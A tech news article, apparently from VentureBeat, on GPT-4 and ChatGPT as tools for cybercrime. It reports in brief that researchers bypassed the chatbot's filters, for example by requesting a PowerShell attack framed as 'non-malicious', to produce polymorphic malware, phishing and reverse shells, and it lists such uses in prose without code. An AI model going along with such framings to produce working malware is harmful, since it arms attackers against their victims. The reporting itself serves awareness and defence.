AI & RoboticsNews

GPT-4 kicks AI security risks into higher gear

Join top executives in San Francisco on July 11-12, to hear how leaders are integrating and optimizing AI investments for success. Learn More


As Arthur C. Clarke once put it, any sufficiently advanced technology is “indistinguishable from magic.”

Some might say this is true of ChatGPT, too — including, if you will, black magic. 

Immediately upon its launch in November, security teams, pen testers and developers began discovering exploits in the AI chatbot — and those continue to evolve with its newest iteration, GPT-4, released earlier this month. 

“GPT-4 won’t invent a new cyberthreat,” said Hector Ferran, VP of marketing at BlueWillow AI. “But just as it is being used by millions already to augment and simplify a myriad of mundane daily tasks, so too could it be used by a minority of bad actors to augment their criminal behavior.”

Event

Transform 2023

Join us in San Francisco on July 11-12, where top executives will share how they have integrated and optimized AI investments for success and avoided common pitfalls.

 


Register Now

Evolving technologies, threats

In January, just two months after launch, ChatGPT reached 100 million users — setting a record for the fastest user growth of an app. And as it has become a household name, it is also a shiny new tool for cybercriminals, enabling them to quickly create tools and deploy attacks. 

Most notably, the tool is being used to generate programs that can be used in malware, ransomware and phishing attacks. 

BlackFog, for instance, recently asked the tool to create a PowerShell attack in a “non-malicious” way. The script was generated quickly and was ready to use, according to researchers. 

CyberArk, meanwhile, was able to bypass filters to create polymorphic malware, which can repeatedly mutate. CyberArk also used ChatGPT to mutate code that became highly evasive and difficult to detect. 

And, Check Point Research was able to use ChatGPT to create a convincing spear-phishing attack. The company’s researchers also identified five areas where ChatGPT is being used by hackers: C++ malware that collects PDF files and sends them to FTP; phishing impersonating banks; phishing employees; PHP reverse shell (which initiates a shell session to exploit vulnerabilities and access a victim’s device); and Java programs that download and executes putty that can launch as a hidden PowerShell. 

GPT-4: Exciting new features, risks

The above are just a few examples; there are undoubtedly many more yet to be discovered or put into practice. 

“If you get very specific in the types of queries you are asking for, it is very easy to bypass some of the basic controls and generate malicious code that is actually quite effective,” said Darren Williams, BlackFog founder and CEO. “This can be extrapolated into virtually every discipline, from creative writing to engineering and computer science.”

And, Williams said, “GPT-4 has many exciting new features that unleash new power and possible threats.” 

A good example of this is the way the tool can now accept images as input and adapt them, he said. This can lead to the use of images embedded with malicious code, often referred to as “steganography attacks.”

Essentially, the newest version is “an evolution of an already powerful system and it is still undergoing investigation by our team,” said Williams.

“These tools pose some major advances to what AI can really do and push the entire industry forward, but like any technology, we are still grappling with what controls need to be placed around it,” said Williams. “These tools are still evolving and yes, have some security implications.”

Not the tool — the users

More generally speaking, one area of concern is the use of ChatGPT to augment or enhance the existing spread of disinformation, said Ferran. 

Still, he emphasized, it’s crucial to recognize that malicious intent is not exclusive to AI tools. 

“ChatGPT does not pose any security threats by itself,” said Ferran. “All technology has the potential to be used for good or evil. The security threat comes from bad actors who will use a new technology for malicious purposes.” 

Simply put, said Ferran, “the threat comes from how people choose to use it.”

In response, individuals and organizations will need to become more vigilant and scrutinize communications more closely to try to spot AI-assisted attacks, he said. They must also take proactive measures to prevent misuse by implementing appropriate safeguards, detection methods and ethical guidelines. 

“By doing so, they can maximize the benefits of AI while mitigating the potential risks,” he said. 

Also, addressing threats requires a collective effort from multiple stakeholders. “By working together, we can ensure that ChatGPT and similar tools are used for positive growth and change,” said Ferran. 

And, while the tool has content filters in place to prevent misuse, clearly these can be worked around pretty easily, so “pressure may need to be put on its owners to enhance these protective measures,” he said. 

The capacity for cybersecurity good, too

On the flip side, ChatGPT and other advanced AI tools can be used by organizations for both offensive and defensive capabilities. 

“Fortunately, AI is also a powerful tool to be wielded against bad actors,” said Ferran. 

Cybersecurity companies, for one, are using AI in their efforts to find and catalog malicious threats.

“Cyberthreat management should use every opportunity to leverage AI in their development of preventative measures,” said Ferran, “so they can triumph in what essentially could become a whack-a-mole arms race.”

And, with its enhanced safeguards and ability to detect malicious behavior, it can ultimately be a “powerful asset” for organizations. 

GPT-4 is a remarkable leap forward in natural language-based models, significantly expanding its potential use cases and building on the achievements of its previous iterations,” said Ferran, pointing to its expanded capability to write code in any language, he said.

Williams agreed, saying that AI is like any powerful tool: Organizations must do their own due diligence. 

“Are there risks that people can use it for nefarious purposes? Of course, but the benefits far outweigh the risks,” he said. 

VentureBeat’s mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings.


Author: Taryn Plumb
Source: Venturebeat

Related posts
AI & RoboticsNews

The show’s not over: 2024 sees big boost to AI investment

AI & RoboticsNews

AI on your smartphone? Hugging Face’s SmolLM2 brings powerful models to the palm of your hand

AI & RoboticsNews

Why multi-agent AI tackles complexities LLMs can’t

DefenseNews

US Army buys long-flying solar drones to watch over Pacific units

Sign up for our Newsletter and
stay informed!